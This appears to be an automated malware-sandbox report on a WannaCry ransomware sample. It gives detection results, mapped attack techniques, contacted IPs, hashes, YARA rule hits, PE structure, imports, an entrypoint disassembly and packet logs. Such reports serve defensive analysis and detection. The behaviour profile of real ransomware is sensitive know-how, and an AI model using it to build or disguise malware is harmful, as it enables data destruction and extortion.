Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Service Execution	4 Windows Service	4 Windows Service	12 Masquerading	1 Input Capture	1 Network Share Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	22 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
onq54JS79W.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
onq54JS79W.exe	91%	Virustotal		Browse
onq54JS79W.exe	100%	Avira	TR/AD.WannaCry.sewvt
onq54JS79W.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\tasksche.exe	100%	Avira	TR/AD.WannaCry.sewvt
C:\Windows\tasksche.exe	100%	Joe Sandbox ML
C:\Windows\tasksche.exe	98%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Windows\tasksche.exe	91%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.onq54JS79W.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.onq54JS79W.exe.1ea5084.5.unpack	100%	Avira	TR/Ransom.Gen	Download File
1.2.onq54JS79W.exe.23c78c8.7.unpack	100%	Avira	TR/Ransom.Gen	Download File
1.2.onq54JS79W.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.onq54JS79W.exe.1ed7128.2.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.onq54JS79W.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.onq54JS79W.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.onq54JS79W.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
2.0.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.onq54JS79W.exe.23f996c.8.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.0.onq54JS79W.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.0.onq54JS79W.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.onq54JS79W.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
166.31.97.203	unknown	United States	206	CSC-IGN-AMERUS	false
198.23.134.206	unknown	United States	36352	AS-COLOCROSSINGUS	false
95.154.64.13	unknown	Russian Federation	44724	OCTOPUSNET-ASRU	false
183.120.152.81	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
132.186.234.253	unknown	United Arab Emirates	21575	ENTELPERUSAPE	false
211.1.227.11	unknown	Japan	7671	MCNETNTTSmartConnectCorporationJP	false
134.79.133.16	unknown	United States	3671	SLACUS	false
15.109.32.174	unknown	United States	13979	ATT-IPFRUS	false
60.149.73.57	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
35.154.153.80	unknown	United States	16509	AMAZON-02US	false
108.82.117.186	unknown	United States	7018	ATT-INTERNET4US	false
34.161.239.59	unknown	United States	2686	ATGS-MMD-ASUS	false
146.53.20.247	unknown	United States	1483	DNIC-AS-01483US	false
96.133.134.102	unknown	United States	7922	COMCAST-7922US	false
103.67.179.183	unknown	India	55352	MCPL-INMicroscanComputersPrivateLimitedIN	false
219.238.230.23	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
43.79.81.193	unknown	Japan	4249	LILLY-ASUS	false
28.81.254.86	unknown	United States	7922	COMCAST-7922US	false
113.227.166.24	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
7.237.83.105	unknown	United States	3356	LEVEL3US	false
104.178.211.65	unknown	United States	7018	ATT-INTERNET4US	false
222.15.97.56	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
201.137.113.34	unknown	Mexico	8151	UninetSAdeCVMX	false
103.94.18.103	unknown	Viet Nam	135916	KIENPHONGITS-AS-VNdescrNo14256BachDangChuongDuon	false
91.244.199.203	unknown	Turkey	18013	ASLINE-AS-APASLINELIMITEDHK	false
58.85.178.219	unknown	Japan	9617	ZAQJupiterTelecommunicationsCoLtdJP	false
118.122.224.96	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
5.9.38.126	unknown	Germany	24940	HETZNER-ASDE	false
168.119.46.244	unknown	Germany	24940	HETZNER-ASDE	false
83.126.120.183	unknown	European Union	44307	MDSOLDE	false
162.48.233.89	unknown	United States	35893	ACPCA	false
124.112.217.0	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
93.234.152.135	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
88.98.223.138	unknown	United Kingdom	56478	BCUBE-ASGB	false
214.230.190.164	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
64.65.220.218	unknown	United States	7029	WINDSTREAMUS	false
136.108.51.75	unknown	United States	60311	ONEFMCH	false
45.128.224.16	unknown	Russian Federation	208861	RACKTECHRU	false
72.208.226.239	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
190.248.104.194	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	false
71.175.251.199	unknown	United States	701	UUNETUS	false
152.112.91.28	unknown	South Africa	2018	TENET-1ZA	false
106.15.169.249	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
162.114.193.189	unknown	United States	10921	KIHNETWORKUS	false
172.101.128.182	unknown	United States	11351	TWC-11351-NORTHEASTUS	false
36.27.188.73	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
162.85.56.254	unknown	Canada	701	UUNETUS	false
195.155.132.237	unknown	Turkey	43352	TELETEK-CLOUDTR	false
76.240.24.119	unknown	United States	7018	ATT-INTERNET4US	false
129.148.189.139	unknown	United States	31898	ORACLE-BMC-31898US	false
58.23.94.232	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
48.241.47.231	unknown	United States	2686	ATGS-MMD-ASUS	false
47.203.160.70	unknown	United States	5650	FRONTIER-FRTRUS	false
163.204.80.185	unknown	China	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
111.146.186.249	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
162.229.197.80	unknown	United States	7018	ATT-INTERNET4US	false
185.159.114.100	unknown	Spain	48427	VISOVISION-ASES	false
163.40.80.71	unknown	United States	226	LOS-NETTOS-ASUS	false
197.138.176.247	unknown	Kenya	36914	KENET-ASKE	false
50.111.138.165	unknown	United States	5650	FRONTIER-FRTRUS	false
85.180.181.227	unknown	Germany	6805	TDDE-ASN1DE	false
13.184.232.233	unknown	United States	7018	ATT-INTERNET4US	false
176.124.138.69	unknown	Ukraine	51875	SILVERSERVICEUA	false
148.94.241.133	unknown	United States	786	JANETJiscServicesLimitedGB	false
105.202.97.238	unknown	Egypt	36992	ETISALAT-MISREG	false

Private

IP
10.141.184.235
192.168.2.148
192.168.2.149
192.168.2.146
192.168.2.147
192.168.2.140
192.168.2.141
192.168.2.144
192.168.2.145
192.168.2.142
192.168.2.143
192.168.2.159
192.168.2.157
192.168.2.158
192.168.2.151
192.168.2.152
192.168.2.150
192.168.2.155
192.168.2.156
192.168.2.153
192.168.2.154
192.168.2.126
192.168.2.127
192.168.2.124
192.168.2.125
192.168.2.128
192.168.2.129
192.168.2.122
192.168.2.123
192.168.2.120
192.168.2.121
192.168.2.137
192.168.2.138
192.168.2.135
192.168.2.136

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	856210
Start date and time:	2023-04-29 00:51:24 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	onq54JS79W.exe
Original Sample Name:	2023-04-27_a55d4ecd3ee9a6623c987bdae88293d7_wannacry.exe
Detection:	MAL
Classification:	mal100.rans.expl.evad.winEXE@4/1@0/100
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.4% (good quality ratio 90.1%) Quality average: 76.7% Quality standard deviation: 32.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CSC-IGN-AMERUS	armv7l.elf	Get hash	malicious	Mirai	Browse	166.26.153.173
	7ng2kZTvwS.elf	Get hash	malicious	Mirai	Browse	166.27.158.8
	qS4pVp9Zzr.elf	Get hash	malicious	Mirai	Browse	166.17.92.140
	sZI6NKz51D.elf	Get hash	malicious	Gafgyt, Mirai	Browse	166.17.196.132
	S0SDVjYVMP.elf	Get hash	malicious	Mirai	Browse	166.17.101.255
	oUcRbdZNAx.elf	Get hash	malicious	Mirai	Browse	166.17.92.146
	pandora.x86.elf	Get hash	malicious	Mirai	Browse	166.28.138.61
	z35E52mcYZ.elf	Get hash	malicious	Mirai	Browse	166.17.148.237
	bZrtWZbsnR.elf	Get hash	malicious	Mirai	Browse	20.132.231.191
	fUL2msaIe8.elf	Get hash	malicious	Unknown	Browse	166.19.97.198
	QGixkU6KEd.elf	Get hash	malicious	Unknown	Browse	166.18.1.60
	1UWOa7k76C.elf	Get hash	malicious	Mirai	Browse	166.18.138.164
	ur707cBT7X.elf	Get hash	malicious	Mirai	Browse	166.17.92.114
	Wwk9E3Ks6a.elf	Get hash	malicious	Mirai, Moobot	Browse	166.29.182.14
	ci2E8Tsgjx.elf	Get hash	malicious	Mirai	Browse	192.48.35.87
	CFno42L741.elf	Get hash	malicious	Mirai, Moobot	Browse	166.27.34.141
	TCKOnNwV84.elf	Get hash	malicious	Mirai, Moobot	Browse	166.31.43.244
	x86.elf	Get hash	malicious	Mirai	Browse	20.148.17.104
	EnB99nh8gq.elf	Get hash	malicious	Mirai	Browse	192.48.35.65
	UG1WngRZub.elf	Get hash	malicious	Mirai	Browse	20.137.104.156

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\tasksche.exe	mbXvGlj2dR.dll	Get hash	malicious	Wannacry	Browse
	MSNRf9dZ63.exe	Get hash	malicious	Wannacry	Browse
	7Qu8thR7WW.dll	Get hash	malicious	Wannacry, Virut	Browse
	MSmReFKunQ.dll	Get hash	malicious	Wannacry	Browse
	kXpnLUmuU2.dll	Get hash	malicious	Wannacry	Browse
	TigrxMihsc.dll	Get hash	malicious	Wannacry	Browse
	iTQzi9bir4.dll	Get hash	malicious	Wannacry	Browse
	5nuyzrvshp.dll	Get hash	malicious	Virut, Wannacry	Browse
	JJuyd5UnAs.dll	Get hash	malicious	Wannacry, Virut	Browse
	OiE7MtX6tI.dll	Get hash	malicious	Wannacry, Virut	Browse
	FFrKRs5Q7y.dll	Get hash	malicious	Wannacry	Browse
	rQJydZ0McE.dll	Get hash	malicious	Wannacry	Browse
	svRn7r2Rty.dll	Get hash	malicious	Wannacry, Virut	Browse
	O9KOr4E9LK.dll	Get hash	malicious	Wannacry, Virut	Browse
	rvmsgjuGfo.dll	Get hash	malicious	Wannacry	Browse
	ovoq6aoWTi.dll	Get hash	malicious	Wannacry, Virut	Browse
	fxyKXb2hV5.dll	Get hash	malicious	Wannacry	Browse
	YsoENGep0M.dll	Get hash	malicious	Wannacry	Browse
	oap4r2jjhD.dll	Get hash	malicious	Wannacry	Browse
	11HRaPgStk.dll	Get hash	malicious	Wannacry	Browse

Created / dropped Files

C:\Windows\tasksche.exe

Download File

Process:	C:\Users\user\Desktop\onq54JS79W.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3514368
Entropy (8bit):	7.996072890929898
Encrypted:	true
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
MD5:	7F7CCAA16FB15EB1C7399D422F8363E8
SHA1:	BD44D0AB543BF814D93B719C24E90D8DD7111234
SHA-256:	2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
SHA-512:	83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
Malicious:	true
Yara Hits:	Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly) Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 98% Antivirus: Virustotal, Detection: 91%, Browse
Joe Sandbox View:	Filename: mbXvGlj2dR.dll, Detection: malicious, Browse Filename: MSNRf9dZ63.exe, Detection: malicious, Browse Filename: 7Qu8thR7WW.dll, Detection: malicious, Browse Filename: MSmReFKunQ.dll, Detection: malicious, Browse Filename: kXpnLUmuU2.dll, Detection: malicious, Browse Filename: TigrxMihsc.dll, Detection: malicious, Browse Filename: iTQzi9bir4.dll, Detection: malicious, Browse Filename: 5nuyzrvshp.dll, Detection: malicious, Browse Filename: JJuyd5UnAs.dll, Detection: malicious, Browse Filename: OiE7MtX6tI.dll, Detection: malicious, Browse Filename: FFrKRs5Q7y.dll, Detection: malicious, Browse Filename: rQJydZ0McE.dll, Detection: malicious, Browse Filename: svRn7r2Rty.dll, Detection: malicious, Browse Filename: O9KOr4E9LK.dll, Detection: malicious, Browse Filename: rvmsgjuGfo.dll, Detection: malicious, Browse Filename: ovoq6aoWTi.dll, Detection: malicious, Browse Filename: fxyKXb2hV5.dll, Detection: malicious, Browse Filename: YsoENGep0M.dll, Detection: malicious, Browse Filename: oap4r2jjhD.dll, Detection: malicious, Browse Filename: 11HRaPgStk.dll, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945315471929952
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	onq54JS79W.exe
File size:	3751936
MD5:	a55d4ecd3ee9a6623c987bdae88293d7
SHA1:	e66e886608680c5792041112081e35ac003731b9
SHA256:	172f9cd29c170eca6db481e392af3dc395709e8086256f9699f216d6cf5b9191
SHA512:	ad6235fc24fdea279d220332b783ce72645d5b031ef15310a295bb7067865888ca71fd798d89a5cd31f585a49f9af901fe6cb9a18ed3af7f8e82f0db5d98e8e2
SSDEEP:	98304:n8qPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:n8qPe1Cxcxk3ZAEUadzR8yc4H
TLSH:	A6063394612CB2FCF0450EB44463896AB7B33C6967BA5E1F9BC086670D43F5BAFD0641
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x409a16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x38E8B7FB [Mon Apr 3 15:25:47 2000 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9ecee117164e0b870a53dd187cdd7174

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040A1A0h
push 00409BA2h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040A0C0h]
pop ecx
or dword ptr [0070F894h], FFFFFFFFh
or dword ptr [0070F898h], FFFFFFFFh
call dword ptr [0040A0C8h]
mov ecx, dword ptr [0070F88Ch]
mov dword ptr [eax], ecx
call dword ptr [0040A0CCh]
mov ecx, dword ptr [0070F888h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040A0E4h]
mov eax, dword ptr [eax]
mov dword ptr [0070F890h], eax
call 00007F2C54B0E8A1h
cmp dword ptr [00431410h], ebx
jne 00007F2C54B0E78Eh
push 00409B9Eh
call dword ptr [0040A0D4h]
pop ecx
call 00007F2C54B0E873h
push 0040B010h
push 0040B00Ch
call 00007F2C54B0E85Eh
mov eax, dword ptr [0070F884h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0070F880h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040A0DCh]
push 0040B008h
push 0040B000h
call 00007F2C54B0E82Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1e0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x310000	0x362000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9000	0x9000	False	0.5517306857638888	data	6.232628145993056	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x998	0x1000	False	0.29345703125	data	3.503615586181224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x30489c	0x27000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x310000	0x362000	0x362000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country
R	0x3100a4	0x35a000	PE32 executable (GUI) Intel 80386, for MS Windows	English	United States
RT_VERSION	0x66a0a4	0x3b0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dll	StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dll	closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll	??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll	GetAdaptersInfo, GetPerAdapterInfo
WININET.dll	InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll	__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2023 00:52:19.004309893 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.004443884 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.004499912 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.004545927 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.004784107 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.004832983 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:52:19.017173052 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017230034 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017280102 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017326117 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017822027 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017940998 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.017987967 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018019915 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018053055 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018134117 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018198013 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018560886 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018611908 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018657923 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018703938 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018752098 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018800020 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018846035 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018892050 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018939018 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.018986940 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019098997 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019145966 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019193888 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019242048 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019288063 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019334078 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019376993 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019458055 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019507885 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019551039 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019597054 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019640923 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019685984 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019731045 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019777060 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019824028 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019870996 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019912958 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.019959927 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.025369883 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.025418043 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.025454044 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.025490999 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:52:19.025675058 CEST	49691	443	192.168.2.4	23.0.174.122
